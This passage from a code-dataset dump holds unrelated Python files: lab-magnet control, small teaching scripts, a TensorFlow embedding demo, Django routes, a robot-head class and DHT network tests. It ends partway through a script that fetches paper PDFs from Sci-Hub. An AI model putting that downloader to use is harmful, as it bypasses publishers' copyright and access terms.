self._fieldoffset=0.0\n self._alphaoffset=0.0\n self._phioffset=0.0\n self.set_field(self.get_totalField())\n self.set_alpha(self.get_totalAlpha())\n self.remove_parameter('offsetField')\n self.remove_parameter('offsetAlpha')\n self.remove_parameter('offsetPhi')\n self.remove_parameter('totalField')\n self.remove_parameter('totalAlpha')\n self.remove_parameter('totalPhi')\n return True\n else:\n return True\n \n def do_get_offsetField(self):\n return self._fieldoffset\n \n def do_set_offsetField(self, value):\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=value*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=value*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=value*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._fieldoffset=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return 
True\n else:\n logging.error(__name__ + ': Error while applying offset field')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False\n \n def do_get_offsetAlpha(self):\n return self._alphaoffset\n \n def do_set_offsetAlpha(self, value):\n a=math.radians(self._alpha)\n ao=math.radians(value)\n f=math.radians(self._phi)\n fo=math.radians(self._phioffset)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXY(Bxtot, Bytot):\n self._alphaoffset=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying offset alpha')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n \n def do_get_offsetPhi(self):\n return self._phioffset\n\n def do_set_offsetPhi(self, value):\n a=math.radians(self._alpha)\n ao=math.radians(self._alphaoffset)\n f=math.radians(self._phi)\n fo=math.radians(value)\n Bxtot=self._fieldoffset*math.cos(ao)*math.sin(fo)+self._field*math.cos(a)*math.sin(f)\n Bytot=self._fieldoffset*math.sin(ao)*math.sin(fo)+self._field*math.sin(a)*math.sin(f)\n Bztot=self._fieldoffset*math.cos(fo)+self._field*math.cos(f)\n if self._field_limit(Bxtot, Bytot, Bztot):\n if self._sweepFieldsXYZ(Bxtot, Bytot, Bztot):\n self._phioffset=value\n self.get_totalField()\n self.get_totalAlpha()\n self.get_totalPhi()\n return True\n else:\n logging.error(__name__ + ': Error while applying offset phi')\n return False\n else: \n logging.error(__name__ + ': Field limit exceeded in offset mode')\n return False \n \n # Note: totalField is readonly in offset mode\n # and always returns the value read from the instrument\n \n def do_get_totalField(self):\n return math.hypot(math.hypot(self.get_fieldX(), self.get_fieldY()),self.get_fieldZ())\n \n # This is a tricky one\n # if it gives problems, I will just put it in try catch\n \n def do_get_totalAlpha(self):\n Bxtot=self.get_fieldX()\n Bytot=self.get_fieldY()\n Bztot=self.get_fieldZ()\n if Bztot != 0.0:\n if Bxtot != 0.0:\n return math.degrees(math.atan2(Bytot,Bxtot))\n else:\n if Bytot < 0.0:\n return 270.0\n else:\n return 90.0\n else:\n return 0.0\n \n # Same applies to this one\n \n def do_get_totalPhi(self):\n Bxtot=self.get_fieldX()\n Bytot=self.get_fieldY()\n Bztot=self.get_fieldZ()\n if Bztot != 0.0:\n return math.degrees(math.atan2(math.hypot(Bxtot, Bytot),Bztot))\n else:\n return 90.0 \n \n # checking if field is safe to apply\n # this is required only for offset XYZ fields\n # for now we only check field amplitude\n \n def _field_limit(self, Bx, By, Bz):\n if math.hypot(math.hypot(Bx, By),Bz) < self.FIELDRATING_XYZ:\n return True\n else:\n return False\n \n # these functions ensure that we always stay within the limit of the vectorfield\n \n def _sweep_X_then_Y(self, Bx, By):\n return self._channelX.set_field(Bx) and self._channelY.set_field(By)\n \n def _sweep_Y_then_X(self, Bx, By):\n return self._channelY.set_field(By) and self._channelX.set_field(Bx)\n\n def _sweep_XY_then_Z(self, Bx, By, Bz):\n return self._channelX.set_field(Bx) and self._channelY.set_field(By) and self._channelZ.set_field(Bz)\n \n def _sweep_Z_then_XY(self, Bx, By, Bz):\n return self._channelZ.set_field(Bz) and self._channelX.set_field(Bx) 
and self._channelY.set_field(By) \n \n def _sweepFieldsXY(self, Bx, By):\n oldXfield=self.get_fieldX()\n oldYfield=self.get_fieldY() #this is just to update By value\n if math.fabs(Bx) < math.fabs(oldXfield):\n return self._sweep_X_then_Y(Bx, By)\n else:\n return self._sweep_Y_then_X(Bx, By)\n\n def _sweepFieldsXYZ(self, Bx, By, Bz):\n oldXfield=self.get_fieldX() #this is just to update Bx value\n oldYfield=self.get_fieldY() #this is just to update By value\n oldZfield=self.get_fieldZ() \n if math.fabs(Bz) < math.fabs(oldZfield):\n return self._sweep_Z_then_XY(Bx, By, Bz)\n else:\n return self._sweep_XY_then_Z(Bx, By, Bz)\n\n\n ","sub_path":"instrument_plugins/AMI430_3D.py","file_name":"AMI430_3D.py","file_ext":"py","file_size_in_byte":41188,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"635952276","text":"import string, operator\n\nclass Histograma:\n\n def __init__(self, fichero):\n self._fichero = fichero\n\n def histograma(self):\n dicc = {}\n\n try:\n s = open(self._fichero, \"rt\")\n print(\"Leyendo archivo:\",self._fichero)\n ch = s.read(1)\n while ch != '':\n if(ch == '\\n' or ch == ' '):\n ch = s.read(1)\n continue\n if ch in dicc:\n dicc[ch] = dicc[ch] + 1\n else:\n dicc[ch] = 1\n ch = s.read(1)\n s.close()\n except IOError as e:\n print(\"IOERROR: \",e)\n\n return dicc\n\nprograma = Histograma('documento.txt')\ndiccionario = programa.histograma()\n\nfor clave in sorted(diccionario.items(), key=operator.itemgetter(1), reverse=True):\n #print(clave)\n print(\"Numero de '\",clave[0],\"': \",clave[1], sep='')\n","sub_path":"business-management-systems/python/module_6/ficheros/hinstograma.py","file_name":"hinstograma.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"377261596","text":"import csv\n\nwith open('faculty.csv', 'rb') as faculty:\n with open(\"emails.csv\", 'wb') as f:\n reader = csv.reader(faculty)\n writer = csv.writer(f)\n next(faculty)\n for name, degree, title, email in reader:\n writer.writerow([email])\n\n","sub_path":"python/advanced_python_csv.py","file_name":"advanced_python_csv.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"226676790","text":"#!/usr/bin/env python3\n# coding: utf-8\nimport ev3dev.ev3 as ev3\nfrom ev3dev.ev3 import *\n#from multiprocessing import Process\nfrom time import sleep\nfrom time import time\ncor = ev3.ColorSensor('in3'); assert cor.connected\nclass Calibracao:\n def __init__(self, color, speed, time):\n self.color = color\n self.speed = speed\n self.time = time\n self.p1 = [1021,-1]\n self.p2 = [1021,-1]\n self.p3 = [1021,-1]\n def calibrate(self,wait_time, repeat):\n for i in range(repeat):\n cor_lida = cor.raw\n self.p1[0] = min(cor.raw[0], self.p1[0])\n self.p1[1] = max(cor.raw[0], self.p1[1])\n self.p2[0] = min(cor.raw[1], self.p2[0])\n self.p2[1] = max(cor.raw[1], self.p2[1])\n self.p3[0] = min(cor.raw[2], self.p3[0])\n self.p3[1] = max(cor.raw[2], self.p3[1])\n sleep(wait_time)\n def escrever(self):\n with open(self.color, \"w\") as arquivo:\n arquivo.write(str(self.p1[0]))\n arquivo.write(\",\")\n arquivo.write(str(self.p1[1]))\n arquivo.write(\",\")\n arquivo.write(str(self.p2[0]))\n arquivo.write(\",\")\n arquivo.write(str(self.p2[1]))\n arquivo.write(\",\")\n arquivo.write(str(self.p3[0]))\n arquivo.write(\",\")\n arquivo.write(str(self.p3[1]))\n 
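# added note: the file written here is a single line of the form\n # \"min0,max0,min1,max1,min2,max2,\" (one min/max pair per raw colour\n # channel); the final write below leaves a trailing comma, which any\n # reader of textos/*.txt must tolerate\n 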
arquivo.write(\",\")\nSound.speak(\"Calibrate\").wait()\nSound.speak(\"Middle Black\")\npreto = Calibracao(\"textos/preto_meio.txt\",0,0)\npreto.calibrate(0.1, 100)\npreto.escrever()\nSound.speak(\"Finished\")\n\n","sub_path":"calibrar/calibrar_meio_preto.py","file_name":"calibrar_meio_preto.py","file_ext":"py","file_size_in_byte":1591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"78833277","text":"import random\nimport math\n\n\n\ndef randomkey(i):\n\n return random.choice(list(i.keys()))\n\ndef randvalue(i, k):\n\n return random.choice(i[k])\n\n\nif __name__ == \"__main__\":\n book = 'sherlock_small.txt'\n with open(book, 'r') as fp:\n input = fp.read()\n\n input = input.replace('\\n', ' ').replace('\\r', ' ').lower()\n punctuation = set(['--', '.', ',', '!', '(', ')'])\n for p in punctuation:\n input = input.replace(p, f' {p} ') # pad so each punctuation mark splits into its own token\n words = input.split()\n\n trigrams = {}\n for j in range(len(words) - 2): # a trigram: a two-word key and the word that follows it\n key = tuple(words[j:j + 2])\n value = words[j + 2]\n if key in trigrams.keys():\n trigrams[key].append(value)\n else:\n trigrams[key] = []\n trigrams[key].append(value)\n\n key_init = randomkey(trigrams)\n value_init = randvalue(trigrams, key_init)\n out_list = list(key_init)\n out_list.append(value_init)\n for i in range(1000):\n k = tuple(out_list[-2:])\n if k in trigrams:\n v = randvalue(trigrams, k)\n else:\n k = randomkey(trigrams)\n for w in list(k):\n out_list.append(w)\n v = randvalue(trigrams, k)\n out_list.append(v)\n paragraph = ' '.join(out_list)\n print(paragraph)","sub_path":"students/vvinodh/Lesson4/kata.py","file_name":"kata.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"205503911","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nRun with: mpirun -n 4 python -m runner_example\n\"\"\"\nfrom pyDNMFk.runner import pyDNMFk_Runner\nimport numpy as np\n\nrunner = pyDNMFk_Runner(itr=100, init='nnsvd', verbose=True, \n norm='fro', method='mu', precision=np.float32,\n checkpoint=False, sill_thr=0.6)\n\nresults = runner.run(grid=[4,1], fpath='../data/', fname='wtsi', ftype='mat', results_path='../results/',\n k_range=[1,3], step_k=1)\n\nW = results[\"W\"]\nH = results[\"H\"]","sub_path":"examples/runner_example.py","file_name":"runner_example.py","file_ext":"py","file_size_in_byte":530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"279167817","text":"# Ripped off from https://tfhub.dev/google/universal-sentence-encoder-lite/2\nimport tensorflow as tf\nimport tensorflow_hub as hub\nimport sentencepiece as spm\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport pandas as pd\nimport re\nimport seaborn as sns\n\n\n# Compute a representation for each message, showing various lengths supported.\nword = \"Elephant\"\nsentence = \"I am a sentence for which I would like to get its embedding.\"\nparagraph = (\n \"Universal Sentence Encoder embeddings also support short paragraphs. \"\n \"There is no hard limit on how long the paragraph is. 
Roughly, the longer \"\n \"the more 'diluted' the embedding will be.\")\nmessages = [word, sentence, paragraph]\n\nmodule = hub.Module(\"https://tfhub.dev/google/universal-sentence-encoder-lite/2\")\n\n\ninput_placeholder = tf.sparse_placeholder(tf.int64, shape=[None, None])\nencodings = module(\n inputs=dict(\n values=input_placeholder.values,\n indices=input_placeholder.indices,\n dense_shape=input_placeholder.dense_shape))\n\nwith tf.Session() as sess:\n spm_path = sess.run(module(signature=\"spm_path\"))\n\nsp = spm.SentencePieceProcessor()\nsp.Load(spm_path)\nprint(\"SentencePiece model loaded at {}.\".format(spm_path))\n\n\ndef process_to_IDs_in_sparse_format(sp, sentences):\n # A utility method that processes sentences with the sentence piece processor\n # 'sp' and returns the results in tf.SparseTensor-similar format:\n # (values, indices, dense_shape)\n print(\"sentences\", sentences)\n ids = [sp.EncodeAsIds(x) for x in sentences] #convert words in sentences to indexes\n print(\"ids\", ids) # array of [index for each word]\n max_len = max(len(x) for x in ids) #num_samples, 3\n dense_shape=(len(ids), max_len)#(3, 53)\n print(\"dense_shape\", dense_shape) \n values=[item for sublist in ids for item in sublist] #flatten\n indices=[[row,col] for row in range(len(ids)) for col in range(len(ids[row]))]\n print(\"values\", values)\n print(\"indices\", indices)\n print(\"dense_shape\", dense_shape)\n return (values, indices, dense_shape)\n\n\nvalues, indices, dense_shape = process_to_IDs_in_sparse_format(sp, messages)\n\n\n# Reduce logging output.\ntf.logging.set_verbosity(tf.logging.ERROR)\n\nwith tf.Session() as session:\n session.run([tf.global_variables_initializer(), tf.tables_initializer()])\n message_embeddings = session.run(\n encodings,\n feed_dict={input_placeholder.values: values,\n input_placeholder.indices: indices,\n input_placeholder.dense_shape: dense_shape})\n\n for i, message_embedding in enumerate(np.array(message_embeddings).tolist()):\n print(\"Message: {}\".format(messages[i]))\n print(\"Embedding size: {}\".format(len(message_embedding)))\n message_embedding_snippet = \", \".join(\n (str(x) for x in message_embedding[:3]))\n print(\"Embedding: [{}, ...]\\n\".format(message_embedding_snippet))\n\n\n\n\n\nembed_size = module.get_output_info_dict()['default'].get_shape()[1].value\nprint(embed_size)\ndef UniversalEmbedding(x):\n return module(tf.squeeze(tf.cast(x, tf.string)), signature=\"default\", as_dict=True)[\"default\"]\n'''\ndef UniversalEmbedding(x):\n return module(tf.squeeze(tf.cast(x, tf.string)))\n'''\nfrom keras import layers # layers.Input/Lambda/Dense are used below, so import the module itself\nfrom keras.models import Model\n\n\ninput_text = layers.Input(shape=(1,), dtype=tf.string)\nembedding = layers.Lambda(UniversalEmbedding, output_shape=(embed_size,))(input_text)\ndense = layers.Dense(256, activation='relu')(embedding)\npred = layers.Dense(6, activation='softmax')(dense)\nmodel = Model(inputs=[input_text], outputs=pred)\nmodel.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])\nmodel.summary()","sub_path":"lite-2.py","file_name":"lite-2.py","file_ext":"py","file_size_in_byte":3632,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"97086467","text":"from django.conf.urls import url\nfrom django.conf import settings\nfrom . 
 import views\n\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n\n url(r'^(?P[0-9]+)/$', views.preview, name='preview'),\n\n url(r'^(?P[0-9]+)/subview/$', views.subview, name='subview'),\n \n url(r'^(?P[0-9]+)/code/$', views.code, name='code'),\n \n url(r'^(?P[0-9]+)/edit$', views.edit, name='edit'),\n\n url(r'^create-action|create-info|create-appeal/$', views.create, name='create'),\n]\n","sub_path":"emailmanager/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"18491706","text":"# -*- coding: utf-8 -*-\nimport json\nfrom collections import OrderedDict\nfrom gl_lib.sim.robot.sensor import CapteurIR, Accelerometre, Camera, Capteur\n\nfrom gl_lib.sim.geometry import *\nfrom math import pi\n\n\nclass Tete(Objet3D):\n \"\"\"\n Defines a head, its sensors and its rotation primitives\n\n The centre and the direction of the head can be tied to a pair (centre, dir_robot) (cf. __init__)\n The head can always rotate relative to dir_robot, provided direction is updated with set_dir()\n \"\"\"\n # keys used to look up the sensors\n SENSORS = [\"acc\", \"ir\", \"cam\"]\n KEYS = [\"centre\", \"dir_robot\", \"dir_rel\", \"direction\", \"sensors\"]\n INIT = {\"centre\":Point(0,0,0),\"dir_robot\":Vecteur(1,0,0), \"dir_rel\":Vecteur(1,0,0), \"direction\":Vecteur(1,0,0)}\n\n def __init__(self, **kwargs):\n \"\"\"\n Initialises the attributes of the head, with the direction of the head equal in value to the reference\n direction\n\n The head created by default is equipped with 3 sensors: infrared distance sensor, camera and accelerometer\n :param centre: Centre of the head\n :type centre: Point\n :param dir_robot: Reference direction of the head\n :type dir_robot: Vecteur\n :param dir_rel: Direction of the head relative to the reference direction\n :type dir_rel: Vecteur\n :param direction: Actual direction of the head\n :type direction: Vecteur\n :param sensors: Dictionary of sensors\n :type sensors: {Capteur}\n \"\"\"\n for key in Tete.INIT.keys():\n if not key in kwargs.keys():\n kwargs[key] = Tete.INIT[key]\n keys = kwargs.keys()\n Objet3D.__init__(self, **{key:kwargs[key] for key in keys if key in Objet3D.KEYS})\n self.dir_robot = kwargs[\"dir_robot\"]\n self.dir_rel = kwargs[\"dir_rel\"]\n angle = self.dir_rel.get_angle()\n self.direction = self.dir_robot.clone().rotate(angle)\n\n if \"direction\" in keys:\n self.direction = kwargs[\"direction\"]\n\n if \"sensors\" in keys:\n self.sensors = kwargs[\"sensors\"]\n for c in self.sensors.keys():\n (self.sensors[c]).attach(self.centre, (self.sensors[c]).direction)\n else:\n # If no dictionary is given as argument, initialise a default one\n self.sensors = dict()\n self.sensors[\"ir\"] = CapteurIR(self.centre, self.direction)\n self.sensors[\"acc\"] = Accelerometre(self.centre, self.direction)\n self.sensors[\"cam\"] = Camera(self.centre, self.direction)\n\n\n def add_sensors(self, dict_sensors):\n \"\"\"\n Allows adding any type of sensor\n It only needs to be given, with its name, as an argument in a dictionary\n\n :param dict_sensors: Dictionary containing \"sensorname\":sensor pairs\n :type dict_sensors: {Capteur}\n :return: Returns the number of sensors added\n\n \"\"\"\n if len(dict_sensors.keys()) < 1:\n return 0\n cpt = 0\n for key in dict_sensors.keys():\n self.sensors[key] = dict_sensors[key].clone()\n cpt += 1\n return cpt\n\n def attach(self, centre, direction):\n 
\"\"\"\n Attaches the head and its sensors to a point and a direction;\n the direction is stored by value, unlike the centre of the head, which keeps pointing at centre\n\n :param centre: The reference is copied\n :type centre: Point\n :param direction: The reference is copied\n :type direction: Vecteur\n \"\"\"\n self.dir_robot = direction\n # The direction of the head is initialised to direction, but does not point at the argument\n self.direction = direction.clone()\n # Unlike the centre of the head\n self.centre = centre\n for k in Tete.SENSORS:\n if self.sensors[k] is not None:\n # The same goes for the sensors\n self.sensors[k].centre = centre\n self.sensors[k].direction = self.direction.clone()\n\n def __dict__(self):\n dct = OrderedDict()\n dct[\"__class__\"] = Tete.__name__\n l = list()\n if len(self.sensors) >= 1:\n l = {k: self.sensors[k].__dict__() for k in Tete.SENSORS if self.sensors[k] is not None}\n dct[\"centre\"] = self.centre.__dict__()\n dct[\"direction\"] = self.direction.__dict__()\n dct[\"dir_robot\"] = self.dir_robot.__dict__()\n dct[\"dir_rel\"] = self.dir_rel.__dict__()\n dct[\"lcapteurs\"] = l\n return dct\n\n def __str__(self):\n \"\"\"\n Only displays the class name and the list of sensors in simplified form\n \"\"\"\n s = \"{}; sensors: {}\".format(self.__class__.__name__, [str(self.sensors[key]) for key in self.sensors.keys()])\n return s\n\n def __eq__(self, other):\n if Objet3D.__eq__(self, other) is False:\n return False\n if self.dir_robot != other.dir_robot or self.direction != other.direction:\n return False\n if self.dir_rel != other.dir_rel:\n return False\n for k in self.sensors.keys():\n if self.sensors[k] != other.sensors[k]:\n return False\n return True\n\n def rotate(self, angle: float, axis=None):\n \"\"\"\n Rotates the vector representing the direction of the head relative to that of the robot, taken as (1,0,0)\n \"\"\"\n self.dir_rel.rotate(angle, axis)\n\n def set_dir(self):\n \"\"\"\n Updates the direction of the head from its relative direction dir_rel and the reference\n direction dir_robot\n \"\"\"\n angle = self.dir_rel.get_angle()\n self.direction = self.dir_robot.clone().rotate(angle)\n for key in self.sensors.keys():\n self.sensors[key].direction = self.direction\n self.sensors[key].centre = self.centre\n\n def update(self):\n \"\"\"\n Updates the direction and the sensors\n \"\"\"\n self.set_dir()\n for k in self.sensors.keys():\n self.sensors[k].update()\n\n @staticmethod\n def hook(dct):\n if not \"__class__\" in dct.keys():\n return dct\n if dct[\"__class__\"] == Vecteur.__name__:\n return Vecteur.hook(dct)\n elif dct[\"__class__\"] == Point.__name__:\n return Point.hook(dct)\n elif dct[\"__class__\"] == CapteurIR.__name__:\n return CapteurIR.hook(dct)\n elif dct[\"__class__\"] == Camera.__name__:\n return Camera.hook(dct)\n elif dct[\"__class__\"] == Accelerometre.__name__:\n return Accelerometre.hook(dct)\n elif dct[\"__class__\"] == Tete.__name__:\n return Tete(**dct)\n\n @staticmethod\n def load(filename):\n \"\"\"\n Loads a head saved in json format\n\n :param filename: Name of the file to load\n\n \"\"\"\n with open(filename, 'r', encoding='utf-8') as f:\n return json.load(f, object_hook=Tete.hook)\n\n\n\nif __name__ == '__main__':\n t = Tete()\n\n t.save(\"tete.json\")\n t2 = Tete.load(\"tete.json\")\n print(str(t2))\n","sub_path":"gl_lib/sim/robot/Tete.py","file_name":"Tete.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"}
+{"seq_id":"94064713","text":"import contextlib\nimport typing\nimport binascii\nimport socket\nimport asyncio\nfrom lbry.testcase import AsyncioTestCase\nfrom tests import dht_mocks\nfrom lbry.conf import Config\nfrom lbry.dht import constants\nfrom lbry.dht.node import Node\nfrom lbry.dht.peer import PeerManager, make_kademlia_peer\nfrom lbry.dht.blob_announcer import BlobAnnouncer\nfrom lbry.extras.daemon.storage import SQLiteStorage\nfrom unittest import skip\n\nclass TestBlobAnnouncer(AsyncioTestCase):\n async def setup_node(self, peer_addresses, address, node_id):\n self.nodes: typing.Dict[int, Node] = {}\n self.advance = dht_mocks.get_time_accelerator(self.loop, self.loop.time())\n self.conf = Config()\n self.storage = SQLiteStorage(self.conf, \":memory:\", self.loop, self.loop.time)\n await self.storage.open()\n self.peer_manager = PeerManager(self.loop)\n self.node = Node(self.loop, self.peer_manager, node_id, 4444, 4444, 3333, address)\n await self.node.start_listening(address)\n self.blob_announcer = BlobAnnouncer(self.loop, self.node, self.storage)\n for node_id, address in peer_addresses:\n await self.add_peer(node_id, address)\n self.node.joined.set()\n self.node._refresh_task = self.loop.create_task(self.node.refresh_node())\n\n async def add_peer(self, node_id, address, add_to_routing_table=True):\n n = Node(self.loop, PeerManager(self.loop), node_id, 4444, 4444, 3333, address)\n await n.start_listening(address)\n self.nodes.update({len(self.nodes): n})\n if add_to_routing_table:\n self.node.protocol.add_peer(\n make_kademlia_peer(\n n.protocol.node_id, n.protocol.external_ip, n.protocol.udp_port\n )\n )\n\n @contextlib.asynccontextmanager\n async def _test_network_context(self, peer_addresses=None):\n self.peer_addresses = peer_addresses or [\n (constants.generate_id(2), '1.2.3.2'),\n (constants.generate_id(3), '1.2.3.3'),\n (constants.generate_id(4), '1.2.3.4'),\n (constants.generate_id(5), '1.2.3.5'),\n (constants.generate_id(6), '1.2.3.6'),\n (constants.generate_id(7), '1.2.3.7'),\n (constants.generate_id(8), '1.2.3.8'),\n (constants.generate_id(9), '1.2.3.9'),\n ]\n try:\n with dht_mocks.mock_network_loop(self.loop):\n await self.setup_node(self.peer_addresses, '1.2.3.1', constants.generate_id(1))\n yield\n finally:\n self.blob_announcer.stop()\n self.node.stop()\n for n in self.nodes.values():\n n.stop()\n\n async def chain_peer(self, node_id, address):\n previous_last_node = self.nodes[len(self.nodes) - 1]\n await self.add_peer(node_id, address, False)\n last_node = self.nodes[len(self.nodes) - 1]\n peer = last_node.protocol.get_rpc_peer(\n make_kademlia_peer(\n previous_last_node.protocol.node_id, previous_last_node.protocol.external_ip,\n previous_last_node.protocol.udp_port\n )\n )\n await peer.ping()\n return peer\n\n @skip(\"Something from a previous test is leaking into this test and causing it to fail intermittently\")\n async def test_announce_blobs(self):\n blob1 = binascii.hexlify(b'1' * 48).decode()\n blob2 = binascii.hexlify(b'2' * 48).decode()\n\n async with self._test_network_context():\n await self.storage.add_blobs((blob1, 1024), (blob2, 1024), finished=True)\n await self.storage.db.execute(\n \"update blob set next_announce_time=0, should_announce=1 where blob_hash in (?, ?)\",\n (blob1, blob2)\n )\n to_announce = await self.storage.get_blobs_to_announce()\n self.assertEqual(2, len(to_announce))\n self.blob_announcer.start(batch_size=1) # so it covers batching logic\n # takes 60 seconds to start, but we advance 120 to ensure it processed all 
batches\n await self.advance(60.0 * 2)\n to_announce = await self.storage.get_blobs_to_announce()\n self.assertEqual(0, len(to_announce))\n self.blob_announcer.stop()\n\n # test that we can route from a poorly connected peer all the way to the announced blob\n\n await self.chain_peer(constants.generate_id(10), '1.2.3.10')\n await self.chain_peer(constants.generate_id(11), '1.2.3.11')\n await self.chain_peer(constants.generate_id(12), '1.2.3.12')\n await self.chain_peer(constants.generate_id(13), '1.2.3.13')\n await self.chain_peer(constants.generate_id(14), '1.2.3.14')\n await self.advance(61.0)\n\n last = self.nodes[len(self.nodes) - 1]\n search_q, peer_q = asyncio.Queue(loop=self.loop), asyncio.Queue(loop=self.loop)\n search_q.put_nowait(blob1)\n\n _, task = last.accumulate_peers(search_q, peer_q)\n found_peers = await peer_q.get()\n task.cancel()\n\n self.assertEqual(1, len(found_peers))\n self.assertEqual(self.node.protocol.node_id, found_peers[0].node_id)\n self.assertEqual(self.node.protocol.external_ip, found_peers[0].address)\n self.assertEqual(self.node.protocol.peer_port, found_peers[0].tcp_port)\n\n async def test_popular_blob(self):\n peer_count = 150\n addresses = [\n (constants.generate_id(i + 1), socket.inet_ntoa(int(i + 0x01000001).to_bytes(length=4, byteorder='big')))\n for i in range(peer_count)\n ]\n blob_hash = b'1' * 48\n\n async with self._test_network_context(peer_addresses=addresses):\n total_seen = set()\n announced_to = self.nodes[0]\n for i in range(1, peer_count):\n node = self.nodes[i]\n kad_peer = make_kademlia_peer(\n node.protocol.node_id, node.protocol.external_ip, node.protocol.udp_port\n )\n await announced_to.protocol._add_peer(kad_peer)\n peer = node.protocol.get_rpc_peer(\n make_kademlia_peer(\n announced_to.protocol.node_id,\n announced_to.protocol.external_ip,\n announced_to.protocol.udp_port\n )\n )\n response = await peer.store(blob_hash)\n self.assertEqual(response, b'OK')\n peers_for_blob = await peer.find_value(blob_hash, 0)\n if i == 1:\n self.assertNotIn(blob_hash, peers_for_blob)\n self.assertEqual(peers_for_blob[b'p'], 0)\n else:\n self.assertEqual(len(peers_for_blob[blob_hash]), min(i - 1, constants.K))\n self.assertEqual(len(announced_to.protocol.data_store.get_peers_for_blob(blob_hash)), i)\n if i - 1 > constants.K:\n self.assertEqual(len(peers_for_blob[b'contacts']), constants.K)\n self.assertEqual(peers_for_blob[b'p'], ((i - 1) // (constants.K + 1)) + 1)\n seen = set(peers_for_blob[blob_hash])\n self.assertEqual(len(seen), constants.K)\n self.assertEqual(len(peers_for_blob[blob_hash]), len(seen))\n\n for pg in range(1, peers_for_blob[b'p']):\n page_x = await peer.find_value(blob_hash, pg)\n self.assertNotIn(b'contacts', page_x)\n page_x_set = set(page_x[blob_hash])\n self.assertEqual(len(page_x[blob_hash]), len(page_x_set))\n self.assertGreater(len(page_x_set), 0)\n self.assertSetEqual(seen.intersection(page_x_set), set())\n seen.intersection_update(page_x_set)\n total_seen.update(page_x_set)\n else:\n self.assertEqual(len(peers_for_blob[b'contacts']), i - 1)\n self.assertEqual(len(total_seen), peer_count - 2)\n","sub_path":"tests/unit/dht/test_blob_announcer.py","file_name":"test_blob_announcer.py","file_ext":"py","file_size_in_byte":8159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"247519150","text":"#!/usr/bin/env python\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n# Jiao Lin\n# California Institute of Technology\n# (C) 2007 All 
Rights Reserved \n#\n# {LicenseText}\n#\n# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n#\n\n\n\nimport unittestX as unittest\nimport journal\n\n\nclass TestCase(unittest.TestCase):\n\n def test(self):\n from mcstas2.utils.parsers.McStasInstrumentParser import McStasInstrumentParser\n parser = McStasInstrumentParser()\n path = '../../../../../../../instruments/VULCAN/resources/vulcan_asbuilt_L2d.instr'\n text = open(path).read()\n instrument = parser.parse(text)\n return\n\n pass # end of TestCase\n\n\n\ndef pysuite():\n suite1 = unittest.makeSuite(TestCase)\n return unittest.TestSuite( (suite1,) )\n\n\ndef main():\n #debug.activate()\n #journal.debug(\"CompositeNeutronScatterer_Impl\").activate()\n pytests = pysuite()\n alltests = unittest.TestSuite( (pytests, ) )\n res = unittest.TextTestRunner(verbosity=2).run(alltests)\n import sys; sys.exit(not res.wasSuccessful())\n\n \n \nif __name__ == \"__main__\":\n main()\n \n# version\n__id__ = \"$Id$\"\n\n# End of file \n","sub_path":"packages/legacycomponents/mcstas2/tests/mcstas2/utils/parsers/instrumentparser_TestCase.py","file_name":"instrumentparser_TestCase.py","file_ext":"py","file_size_in_byte":1296,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"21"} +{"seq_id":"179401126","text":"from bs4 import BeautifulSoup\nfrom urllib.request import urlopen\nimport re # regex module\nimport requests\nimport os\n\n\naddress = input('\\nEnter a DOI/link/title: ')\nos.chdir('E:') # set the directory where the file is saved\nr = requests.post('https://sci-hub.st/', data={'request': address})\nprint('\\nResponse:', r)\nprint('URL visited:', r.url)\nsoup = BeautifulSoup(r.text, features='lxml')\npdf_URL = soup.iframe['src']\nif re.search(re.compile('^https:'), pdf_URL):\n pass\nelse:\n pdf_URL = 